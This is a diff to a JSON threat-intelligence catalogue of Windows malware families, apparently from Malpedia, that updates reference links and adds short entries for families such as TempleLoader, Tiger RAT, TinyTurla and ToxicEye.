"https://www.zscaler.com/blogs/security-research/hitchhikers-guide-solarwinds-incident-response", @@ -29567,6 +33736,8 @@ "https://blog.truesec.com/2020/12/17/the-solarwinds-orion-sunburst-supply-chain-attack/", "https://techcommunity.microsoft.com/t5/azure-active-directory-identity/understanding-quot-solorigate-quot-s-identity-iocs-for-identity/ba-p/2007610", "https://github.com/SentineLabs/SolarWinds_Countermeasures", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-134a", + "https://www.4hou.com/posts/KzZR", "https://www.mimecast.com/blog/important-security-update/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/solarwinds-attacks-stealthy-attackers-attempted-evade-detection", "https://www.splunk.com/en_us/blog/security/sunburst-backdoor-detections-in-splunk.html", @@ -29575,7 +33746,10 @@ "https://us-cert.cisa.gov/ncas/alerts/aa21-008a", "https://vrieshd.medium.com/finding-sunburst-victims-and-targets-by-using-passivedns-osint-68f5704a3cdc", "https://github.com/fireeye/Mandiant-Azure-AD-Investigator", + "https://www.consilium.europa.eu/en/press/press-releases/2021/04/15/declaration-by-the-high-representative-on-behalf-of-the-european-union-expressing-solidarity-with-the-united-states-on-the-impact-of-the-solarwinds-cyber-operation", + "https://www.wired.com/story/hacker-lexicon-what-is-a-supply-chain-attack/", "https://www.bleepingcomputer.com/news/security/nasa-and-the-faa-were-also-breached-by-the-solarwinds-hackers/", + "https://www.mimecast.com/incident-report/", "https://vxug.fakedoma.in/samples/Exotic/UNC2452/SolarWinds%20Breach/", "https://twitter.com/cybercdh/status/1338885244246765569", "https://research.checkpoint.com/2021/deep-into-the-sunburst-attack/", @@ -29598,14 +33772,23 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.suncrypt", + "https://pcsxcetrasupport3.wordpress.com/2021/03/28/suncrypt-powershell-obfuscation-shellcode-and-more-yara/", + "https://ke-la.com/to-attack-or-not-to-attack-targeting-the-healthcare-sector-in-the-underground-ecosystem/", "https://www.hornetsecurity.com/en/security-informationen-en/leakware-ransomware-hybrid-attacks/", "https://www.bleepingcomputer.com/news/security/suncrypt-ransomware-sheds-light-on-the-maze-ransomware-cartel/", + "https://medium.com/s2wlab/w4-july-en-story-of-the-week-ransomware-on-the-darkweb-c61965d0386a", + "https://www.coveware.com/blog/ransomware-attack-vectors-shift-as-new-software-vulnerability-exploits-abound", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/", - "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", "https://medium.com/@sapphirex00/diving-into-the-sun-suncrypt-a-new-neighbour-in-the-ransomware-mafia-d89010c9df83", + "https://analyst1.com/blog/ransom-mafia-analysis-of-the-worlds-first-ransomware-cartel", + "https://www.accenture.com/us-en/blogs/cyber-defense/evolving-danger-ransomware-extortion", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", "https://www.intezer.com/blog/malware-analysis/when-viruses-mutate-did-suncrypt-ransomware-evolve-from-qnapcrypt", - "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer" + "https://blog.chainalysis.com/reports/ransomware-connections-maze-egregor-suncrypt-doppelpaymer", + "https://analyst1.com/file-assets/RANSOM-MAFIA-ANALYSIS-OF-THE-WORLD%E2%80%99S-FIRST-RANSOMWARE-CARTEL.pdf", + "https://medium.com/s2wlab/case-analysis-of-suncrypt-ransomware-negotiation-and-bitcoin-transaction-43a2194ac0bc" ], "synonyms": [], "type": [] @@ -29632,17 +33815,19 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.supernova", - "https://www.trendmicro.com/en_us/research/20/l/overview-of-recent-sunburst-targeted-attacks.html", + "https://www.splunk.com/en_us/blog/security/supernova-redux-with-a-generous-portion-of-masquerading.html", "https://github.com/fireeye/sunburst_countermeasures", "https://labs.sentinelone.com/solarwinds-understanding-detecting-the-supernova-webshell-trojan/", "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf", "https://www.guidepointsecurity.com/supernova-solarwinds-net-webshell-analysis/", "https://us-cert.cisa.gov/ncas/alerts/aa21-008a", "https://www.anquanke.com/post/id/226029", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-112a", "https://www.solarwinds.com/securityadvisory/faq", "https://www.solarwinds.com/securityadvisory", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-027a", "https://unit42.paloaltonetworks.com/solarstorm-supernova/", + "https://www.trendmicro.com/en_us/research/20/l/overview-of-recent-sunburst-targeted-attacks.html", "https://github.com/fireeye/sunburst_countermeasures/pull/5", "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", "https://www.youtube.com/watch?v=7WX5fCEzTlA", @@ -29741,6 +33926,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.synack", + "https://therecord.media/synack-ransomware-gang-releases-decryption-keys-for-old-victims/", "https://securelist.com/synack-targeted-ransomware-uses-the-doppelganging-technique/85431/" ], "synonyms": [], @@ -29822,7 +34008,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.sysget", - "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/" + "http://researchcenter.paloaltonetworks.com/2017/01/unit42-dragonok-updates-toolset-targets-multiple-geographic-regions/", + "http://csecybsec.com/download/zlab/20180713_CSE_APT28_X-Agent_Op-Roman%20Holiday-Report_v6_1.pdf" ], "synonyms": [], "type": [] @@ -29835,10 +34022,12 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.syskit", - "https://www.darkreading.com/threat-intelligence/iranian-government-hackers-target-us-veterans/d/d-id/1335897", "https://blog.talosintelligence.com/2019/09/tortoiseshell-fake-veterans.html", + "https://twitter.com/QW5kcmV3/status/1176861114535165952", + "https://about.fb.com/news/2021/07/taking-action-against-hackers-in-iran/", "https://www.symantec.com/blogs/threat-intelligence/tortoiseshell-apt-supply-chain", - "https://twitter.com/QW5kcmV3/status/1176861114535165952" + "https://www.darkreading.com/threat-intelligence/iranian-government-hackers-target-us-veterans/d/d-id/1335897", + "https://www.proofpoint.com/us/blog/threat-insight/i-knew-you-were-trouble-ta456-targets-defense-contractor-alluring-social-media" ], "synonyms": [ "IvizTech", @@ -29882,10 +34071,15 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.systembc", - "https://www.proofpoint.com/us/threat-insight/post/systembc-christmas-july-socks5-malware-and-exploit-kits", - "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", "https://isc.sans.edu/forums/diary/Excel+spreadsheets+push+SystemBC+malware/27060/", + "https://www.proofpoint.com/us/threat-insight/post/systembc-christmas-july-socks5-malware-and-exploit-kits", + "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor", + "https://news.sophos.com/en-us/2021/04/21/nearly-half-of-malware-now-use-tls-to-conceal-communications/", + "https://blog.reversinglabs.com/blog/code-reuse-across-packers-and-dll-loaders", + "https://www.fireeye.com/blog/threat-research/2021/02/melting-unc2198-icedid-to-ransomware-operations.html", + "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6", "https://news.sophos.com/en-us/2020/10/14/inside-a-new-ryuk-ransomware-attack/", + "https://labs.f-secure.com/blog/prelude-to-ransomware-systembc/", "https://news.sophos.com/en-us/2020/12/16/systembc/" ], "synonyms": [], @@ -29900,6 +34094,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.szribi", "https://www.virusbulletin.com/virusbulletin/2007/11/spam-kernel", + "https://web.archive.org/web/20160616170611/https://media.blackhat.com/bh-eu-10/presentations/Carrera_Silberman/BlackHat-EU-2010-Carrera-Silberman-State-of-Malware-slides.pdf", "https://www.fireeye.com/blog/threat-research/2008/11/technical-details-of-srizbis-domain-generation-algorithm.html", "https://www.secureworks.com/research/srizbi" ], @@ -30015,8 +34210,11 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.taurus_stealer", + "https://blog.morphisec.com/google-ppc-ads-deliver-redline-taurus-and-mini-redline-infostealers", "https://www.zscaler.com/blogs/research/taurus-new-stealer-town", - "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md" + "https://blog.minerva-labs.com/taurus-stealers-evolution", + "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/UnknownTA/2020-09-07/Analysis.md", + "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/an-in-depth-analysis-of-the-new-taurus-stealer/" ], "synonyms": [], "type": [] @@ -30090,6 +34288,8 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.teamspy", + "https://thedfirreport.com/2020/04/24/ursnif-via-lolbins/", + "https://blog.avast.com/a-deeper-look-into-malware-abusing-teamviewer", "https://blog.trendmicro.com/trendlabs-security-intelligence/unsupported-teamviewer-versions-exploited-backdoors-keylogging", "https://www.cyber.nj.gov/threat-center/threat-profiles/trojan-variants/spy-agent" ], @@ -30111,6 +34311,7 @@ "https://www.brighttalk.com/webcast/7451/462719", "https://blog.securehat.co.uk/malware-analysis/extracting-the-cobalt-strike-config-from-a-teardrop-loader", "https://twitter.com/craiu/status/1339954817247158272", + "https://www.youtube.com/watch?v=GfbxHy6xnbA", "https://unit42.paloaltonetworks.com/solarstorm-supply-chain-attack-timeline", "https://www.youtube.com/watch?v=LA-XE5Jy2kU", "https://msrc-blog.microsoft.com/2020/12/21/december-21st-2020-solorigate-resource-center/", @@ -30118,10 +34319,12 @@ "https://www.microsoft.com/security/blog/2021/01/20/deep-dive-into-the-solorigate-second-stage-activation-from-sunburst-to-teardrop-and-raindrop/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://blog.talosintelligence.com/2020/12/solarwinds-supplychain-coverage.html#more", + "https://www.sans.org/webcasts/contrarian-view-solarwinds-119515", "https://twitter.com/TheEnergyStory/status/1346096298311741440", "https://www.fortinet.com/blog/threat-research/what-we-have-learned-so-far-about-the-sunburst-solarwinds-hack", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/sunburst-supply-chain-attack-solarwinds", "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-039b", + "https://symantec.broadcom.com/hubfs/Attacks-Against-Government-Sector.pdf", "https://orangematter.solarwinds.com/2021/01/11/new-findings-from-our-investigation-of-sunburst/", "https://www.microsoft.com/security/blog/2020/12/18/analyzing-solorigate-the-compromised-dll-file-that-started-a-sophisticated-cyberattack-and-how-microsoft-defender-helps-protect/", "https://twitter.com/TheEnergyStory/status/1342041055563313152", @@ -30185,6 +34388,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.telebot", "https://www.secureworks.com/research/threat-profiles/iron-viking", + "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-old-dogs-new-tricks.pdf", "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/" ], "synonyms": [], @@ -30220,6 +34424,19 @@ "uuid": "26b2c2c0-036e-4e3a-a465-71a391046b74", "value": "Tempedreve" }, + { + "description": "A downloader written in Delphi that does direct decryption and memory injection of the payloads it fetches from services like OneDrive into benign processes such as dpiscaling.exe or mobsync.exe. It was observed to download Remcos.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.temple_loader", + "https://app.any.run/tasks/cd25d8c3-1944-4fa0-a4be-436dc1389fca/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "9143b544-ab77-4331-a49c-b420ca89e9c3", + "value": "TempleLoader" + }, { "description": "", "meta": { @@ -30270,7 +34487,9 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_loader", - "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/" + "https://github.com/StrangerealIntel/CyberThreatIntel/blob/master/Additional%20Analysis/Terraloader/2021-03-25/Analysis.md#terraloader--congrats-you-have-a-new-fake-job-", + "https://quointelligence.eu/2020/07/golden-chickens-evolution-of-the-maas/", + "https://medium.com/walmartglobaltech/a-re-look-at-the-terraloader-dropper-dll-e5947ad6e244" ], "synonyms": [], "type": [] @@ -30321,6 +34540,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.terra_tv", + "https://blog.minerva-labs.com/taurus-user-guided-infection", "https://medium.com/@quoscient/the-chicken-keeps-laying-new-eggs-uncovering-new-gc-maas-tools-used-by-top-tier-threat-actors-531d80a6b4e9", "https://www.welivesecurity.com/2020/07/09/more-evil-deep-look-evilnum-toolset/", "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2020CrowdStrikeGlobalThreatReport.pdf" @@ -30371,7 +34591,7 @@ "type": [] }, "uuid": "bd5d0ff1-7bd1-4f8d-bf66-4d02f8e68dd2", - "value": "TFlower Ransomware" + "value": "TFlower" }, { "description": "", @@ -30443,13 +34663,15 @@ "value": "ThumbThief" }, { - "description": "", + "description": "Ransomware.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.thunderx", - "https://id-ransomware.blogspot.com/2020/08/thunderx-ransomware.html", - "https://www.bleepingcomputer.com/news/security/thunderx-ransomware-rebrands-as-ranzy-locker-adds-data-leak-site/", "https://labs.sentinelone.com/ranzy-ransomware-better-encryption-among-new-features-of-thunderx-derivative/", + "https://www.cyborgsecurity.com/cyborg_labs/hunting-ransomware-inhibiting-system-backup-or-recovery/", + "https://www.bleepingcomputer.com/news/security/thunderx-ransomware-rebrands-as-ranzy-locker-adds-data-leak-site/", + "https://docs.google.com/spreadsheets/d/1MI8Z2tBhmqQ5X8Wf_ozv3dVjz5sJOs-3", + "https://id-ransomware.blogspot.com/2020/08/thunderx-ransomware.html", "https://public.intel471.com/blog/ransomware-as-a-service-2020-ryuk-maze-revil-egregor-doppelpaymer/" ], "synonyms": [ @@ -30458,7 +34680,7 @@ "type": [] }, "uuid": "e4be8d83-748e-46df-8dd7-0ce1b2255f36", - "value": "ThunderX Ransomware" + "value": "ThunderX" }, { "description": "", @@ -30486,6 +34708,32 @@ "uuid": "8e7cdcc2-37e1-4927-9c2d-eeb3050c4fca", "value": "Tidepool" }, + { + "description": "under investigation, potentially linked to win.unidentified_082.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiger_rat", + "https://www.krcert.or.kr/filedownload.do?attach_file_seq=3277&attach_file_id=EpF3277.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "57c0d7b4-f46b-44bf-9430-75ac7d3cf2df", + "value": "Tiger RAT" + }, + { + "description": "Standalone implant. Potentially tied to a framework called PATROLWAGON.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tildeb", + "https://documents.trendmicro.com/assets/tech-brief-tildeb-analyzing-the-18-year-old-implant-from-the-shadow-brokers-leak.pdf" + ], + "synonyms": [], + "type": [] + }, + "uuid": "8e846ea0-a46d-47c9-96e9-1cdefd49a846", + "value": "tildeb" + }, { "description": "", "meta": { @@ -30496,6 +34744,7 @@ "https://www.zscaler.com/blogs/research/look-recent-tinba-banking-trojan-variant", "https://securityblog.switch.ch/2015/06/18/so-long-and-thanks-for-all-the-domains/", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", + "https://www.f5.com/labs/articles/education/banking-trojans-a-reference-guide-to-the-malware-family-tree", "http://contagiodump.blogspot.com/2012/06/amazon.html", "http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp_w32-tinba-tinybanker.pdf", "http://garage4hackers.com/entry.php?b=3086", @@ -30536,12 +34785,13 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tinymet", "https://github.com/SherifEldeeb/TinyMet", + "https://www.crowdstrike.com/blog/how-falcon-complete-stopped-a-big-game-hunting-ransomware-attack/", "https://www.blueliv.com/cyber-security-and-cyber-threat-intelligence-blog-blueliv/using-qiling-framework-to-unpack-ta505-packed-samples/", "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/", - "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", + "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", "https://twitter.com/VK_Intel/status/1273292957429510150", "https://www.secureworks.com/research/threat-profiles/gold-niagara", - "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf", + "https://www.fsec.or.kr/common/proc/fsec/bbs/163/fileDownLoad/2297.do", "https://www.telekom.com/en/blog/group/article/cybersecurity-ta505-s-box-of-chocolate-597672" ], "synonyms": [ @@ -30605,6 +34855,19 @@ "uuid": "b933634f-81d0-41ef-bf2f-ea646fc9e59c", "value": "TinyZbot" }, + { + "description": "Talos describes this as a malware family with very scoped functionality and thus a small code footprint, likely used as a second chance backdoor.", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tiny_turla", + "https://blog.talosintelligence.com/2021/09/tinyturla.html" + ], + "synonyms": [], + "type": [] + }, + "uuid": "e1fa6d45-4ac9-4ace-98a9-e21947f0e497", + "value": "TinyTurla" + }, { "description": "", "meta": { @@ -30626,6 +34889,7 @@ "https://insight-jp.nttsecurity.com/post/102gi9b/pandas-new-arsenal-part-1-tmanger", "https://www.welivesecurity.com/2020/12/10/luckymouse-ta428-compromise-able-desktop/", "https://vblocalhost.com/uploads/VB2020-20.pdf", + "https://labs.sentinelone.com/thundercats-hack-the-fsb-your-taxes-didnt-pay-for-this-op/", "https://insight-jp.nttsecurity.com/post/102glv5/pandas-new-arsenal-part-3-smanager", "https://decoded.avast.io/luigicamastra/apt-group-targeting-governmental-agencies-in-east-asia/", "https://vblocalhost.com/uploads/VB2020-Ozawa-etal.pdf" @@ -30646,7 +34910,8 @@ "https://lokalhost.pl/txt/peering.into.spam.botnets.VirusBulletin2017.pdf", "https://www.cert.pl/en/news/single/tofsee-en/", "https://www.cert.pl/en/news/single/a-deeper-look-at-tofsee-modules/", - "https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/" + "https://zerophagemalware.com/2017/03/24/terror-ek-delivers-tofsee-spambot/", + "https://www.dragos.com/blog/investigating-the-watering-hole-linked-to-the-oldsmar-water-treatment-facility-breach/" ], "synonyms": [ "Gheg" @@ -30656,11 +34921,25 @@ "uuid": "53e617fc-d71e-437b-a1a1-68b815d1ff49", "value": "Tofsee" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.tomiris", + "https://securelist.com/darkhalo-after-solarwinds-the-tomiris-connection/104311/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "a5449893-ab06-419b-bb31-4ce16503dcd9", + "value": "tomiris" + }, { "description": "TONEDEAF is a backdoor that communicates with Command and Control servers using HTTP or DNS. Supported commands include system information collection, file upload, file download, and arbitrary shell command execution. When executed, this variant of TONEDEAF wrote encrypted data to two temporary files – temp.txt and temp2.txt – within the same directory of its execution.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.tonedeaf", + "https://research.checkpoint.com/2021/irans-apt34-returns-with-an-updated-arsenal/", "https://www.fireeye.com/blog/threat-research/2019/07/hard-pass-declining-apt34-invite-to-join-their-professional-network.html", "https://intezer.com/blog-new-iranian-campaign-tailored-to-us-companies-uses-updated-toolset/" ], @@ -30690,6 +34969,7 @@ "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.torisma", "https://blogs.jpcert.or.jp/en/2021/01/Lazarus_malware2.html", + "https://global.ahnlab.com/global/upload/download/asecreport/ASEC%20REPORT_vol.102_ENG%20(4).pdf", "http://blog.nsfocus.net/stumbzarus-apt-lazarus/" ], "synonyms": [], @@ -30703,6 +34983,7 @@ "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/win.torrentlocker", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", "http://www.bleepingcomputer.com/forums/t/547708/torrentlocker-ransomware-cracked-and-decrypter-has-been-made/" ], "synonyms": [ @@ -30713,6 +34994,19 @@ "uuid": "7f6cd579-b021-4896-80da-fcc07c35c8b2", "value": "TorrentLocker" }, + { + "description": "", + "meta": { + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.toxiceye", + "https://blog.checkpoint.com/2021/04/22/turning-telegram-toxic-new-toxiceye-rat-is-the-latest-to-use-telegram-for-command-control/" + ], + "synonyms": [], + "type": [] + }, + "uuid": "0d445373-d520-4b67-9066-72f23452c774", + "value": "ToxicEye" + }, { "description": "tRat is a modular RAT written in Delphi and has appeared in campaigns in September and October of 2018.", "meta": { @@ -30758,6 +35052,7 @@ "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf", "https://blog.morphisec.com/trickbot-delivery-method-gets-a-new-upgrade-focusing-on-windows", "https://blog.trendmicro.com/trendlabs-security-intelligence/trickbot-shows-off-new-trick-password-grabber-module", + "https://www.prodaft.com/m/uploads/SilverFish_TLPWHITE.pdf", "https://www.flashpoint-intel.com/blog/trickbot-account-checking-hybrid-attack-model/", "https://www.slideshare.net/proidea_conferences/inside-cybercrime-groups-harvesting-active-directory-for-fun-and-profit-vitali-kremez", "https://www.cyberbit.com/blog/endpoint-security/latest-trickbot-variant-has-new-tricks-up-its-sleeve/", @@ -30773,21 +35068,26 @@ "https://ibm.ent.box.com/s/hs5pcayhbbhjvj8di5sqdpbbd88tsh89", "https://technical.nttsecurity.com/post/102fnog/targeted-trickbot-activity-drops-powerbrace-backdoor", "https://medium.com/@vishal_29486/trickbot-a-concise-treatise-d7e4cc97f737", - "https://www.secureworks.com/blog/trickbot-modifications-target-us-mobile-users", + "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware", + "https://www.zscaler.com/blogs/security-research/new-trickbot-and-bazarloader-campaigns-use-multiple-delivery-vectors", "https://blog.trendmicro.com/trendlabs-security-intelligence/latest-trickbot-campaign-delivered-via-highly-obfuscated-js-file/", + "https://thedfirreport.com/2021/08/01/bazarcall-to-conti-ransomware-via-trickbot-and-cobalt-strike/", "https://www.secureworks.com/research/threat-profiles/gold-swathmore", "https://twitter.com/anthomsec/status/1321865315513520128", "https://www.hhs.gov/sites/default/files/bazarloader.pdf", "https://www.cert.pl/en/news/single/detricking-trickbot-loader/", + "https://community.riskiq.com/article/298c9fc9", "https://labs.sentinelone.com/building-a-custom-malware-analysis-lab-environment/", "https://blog.talosintelligence.com/2020/03/trickbot-primer.html", + "https://www.deepinstinct.com/2019/07/12/trickbooster-trickbots-email-based-infection-module/", "https://www.ringzerolabs.com/2017/07/trickbot-banking-trojan-doc00039217doc.html", "https://blog.talosintelligence.com/2018/07/smoking-guns-smoke-loader-learned-new.html", "https://www.welivesecurity.com/wp-content/uploads/2020/07/ESET_Threat_Report_Q22020.pdf", "https://public.intel471.com/blog/trickbot-online-emotet-microsoft-cyber-command-disruption-attempts/", "https://www.botconf.eu/wp-content/uploads/2016/11/2016-LT09-TrickBot-Adams.pdf", "https://public.intel471.com/blog/global-trickbot-disruption-operation-shows-promise/", - "https://sysopfb.github.io/malware/2018/04/16/trickbot-uacme.html", + "https://threatresearch.ext.hp.com/detecting-a-stealthy-trickbot-campaign/", + "https://www.secureworks.com/research/evolution-of-the-gold-evergreen-threat-group", "https://www.welivesecurity.com/wp-content/uploads/2021/02/ESET_Threat_Report_Q42020.pdf", "https://na.eventscloud.com/file_uploads/6568237bca6dc156e5c5557c5989e97c_CrowdStrikeFal.Con2019_ThroughEyesOfAdversary_J.Ayers.pdf", "http://www.vkremez.com/2017/11/lets-learn-trickbot-socks5-backconnect.html", @@ -30807,26 +35107,37 @@ "https://go.crowdstrike.com/rs/281-OBQ-266/images/Report2021GTR.pdf", "https://blog.fraudwatchinternational.com/malware/trickbot-malware-works", "https://www.justice.gov/opa/pr/officials-announce-international-operation-targeting-transnational-criminal-organization", + "https://www.proofpoint.com/us/blog/security-briefs/threat-actors-pair-tax-themed-lures-covid-19-healthcare-themes", "https://f5.com/labs/articles/threat-intelligence/malware/trickbot-expands-global-targets-beyond-banks-and-payment-processors-to-crms", "https://www.microsoft.com/security/blog/2020/03/05/human-operated-ransomware-attacks-a-preventable-disaster/", "https://blogs.keysight.com/blogs/tech/nwvs.entry.html/2020/12/21/trickbot_a_closerl-TpQ0.html", + "https://www.kryptoslogic.com/blog/2021/07/trickbot-and-zeus/", + "https://marcoramilli.com/2021/01/09/c2-traffic-patterns-personal-notes/", "https://www.microsoft.com/security/blog/2020/10/12/trickbot-disrupted/", + "http://www.secureworks.com/research/threat-profiles/gold-blackburn", "https://blog.malwarebytes.com/threat-analysis/malware-threat-analysis/2018/11/whats-new-trickbot-deobfuscating-elements/", "https://www.bleepingcomputer.com/news/security/lightbot-trickbot-s-new-reconnaissance-malware-for-high-value-targets/", + "https://mal-eats.net/en/2021/05/11/campo_new_attack_campaign_targeting_japan/", + "https://www.intel471.com/blog/Cobalt-strike-cybercriminals-trickbot-qbot-hancitor", "https://www.govcert.admin.ch/blog/36/severe-ransomware-attacks-against-swiss-smes", + "https://us-cert.cisa.gov/ncas/alerts/aa21-076a", "https://www.wilbursecurity.com/2020/03/trickbot-to-ryuk-in-two-hours/", "https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/", "https://www.washingtonpost.com/national-security/cyber-command-trickbot-disrupt/2020/10/09/19587aae-0a32-11eb-a166-dc429b380d10_story.html", "https://medium.com/walmartglobaltech/anchor-and-lazarus-together-again-24744e516607", + "https://www.splunk.com/en_us/blog/security/detecting-trickbots.html", + "https://medium.com/walmartglobaltech/trickbot-crews-new-cobaltstrike-loader-32c72b78e81c", "https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/", - "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/", + "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them", "http://www.pwc.co.uk/issues/cyber-security-data-privacy/research/trickbots-bag-of-tricks.html", + "https://www.securityartwork.es/wp-content/uploads/2017/06/Informe_Evoluci%C3%B3n_Trickbot.pdf", "https://www.cronup.com/post/de-ataque-con-malware-a-incidente-de-ransomware", "https://content.fireeye.com/m-trends/rpt-m-trends-2020", "https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-009.pdf", "https://www.vkremez.com/2018/11/lets-learn-introducing-latest-trickbot.html", "https://gallery.mailchimp.com/c35aef82661dad887b8162a4f/files/e24e8206-a157-4796-a8cb-2b7262cc76e8/CSIS_Threat_Matrix_H1_2019.pdf", "https://www.youtube.com/watch?v=lTywPmZEU1A", + "https://www.pwc.co.uk/issues/cyber-security-services/insights/what-is-behind-ransomware-attacks-increase.html", "https://www.secureworks.com/research/threat-profiles/gold-blackburn", "https://www.fortinet.com/blog/threat-research/global-malicious-spam-campaign-using-black-lives-matter-as-a-lure", "https://engineering.salesforce.com/easily-identify-malicious-servers-on-the-internet-with-jarm-e095edac525a", @@ -30837,11 +35148,13 @@ "https://blog.malwarebytes.com/threat-analysis/2017/08/trickbot-comes-with-new-tricks-attacking-outlook-and-browsing-data/", "https://malware.love/trickbot/malware_analysis/reverse_engineering/2020/11/17/trickbots-latest-trick.html", "http://www.peppermalware.com/2019/03/quick-analysis-of-trickbot-sample-with.html", + "https://medium.com/walmartglobaltech/inside-the-systembc-malware-as-a-service-9aa03afd09c6", "https://blog.malwarebytes.com/threat-analysis/2016/10/trick-bot-dyrezas-successor/", "https://www.youtube.com/watch?v=KMcSAlS9zGE", "https://cofenselabs.com/all-you-need-is-text-second-wave/", "https://news.sophos.com/en-us/2020/02/18/nearly-a-quarter-of-malware-now-communicates-using-tls/", "https://labs.sentinelone.com/revealing-the-trick-a-deep-dive-into-trickloader-obfuscation/", + "https://www.justice.gov/opa/pr/latvian-national-charged-alleged-role-transnational-cybercrime-organization", "http://www.vkremez.com/2018/04/lets-learn-trickbot-implements-network.html", "https://unit42.paloaltonetworks.com/ryuk-ransomware/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/trickbot-botnet-ransomware-disruption", @@ -30862,13 +35175,16 @@ "https://www.domaintools.com/resources/blog/tracking-a-trickbot-related-ransomware-incident", "https://blog.lumen.com/a-look-inside-the-trickbot-botnet/", "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-attacked-epiq-global-via-trickbot-infection/", + "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/21/i/ssl-tls-technical-brief/ssl-tls-technical-brief.pdf", "https://unit42.paloaltonetworks.com/wireshark-tutorial-emotet-infection/", - "https://intezer.com/blog/intezer-analyze/fantastic-payloads-and-where-we-find-them", - "https://www.cybereason.com/blog/cybereason-vs.-ryuk-ransomware", + "https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/", + "https://resource.redcanary.com/rs/003-YRU-314/images/2021-Threat-Detection-Report.pdf", "https://www.heise.de/security/artikel/Emotet-Trickbot-Ryuk-ein-explosiver-Malware-Cocktail-4573848.html", + 